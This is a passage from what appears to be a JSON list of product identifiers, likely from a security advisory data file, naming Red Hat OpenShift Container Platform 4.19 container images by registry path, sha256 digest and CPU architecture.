"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
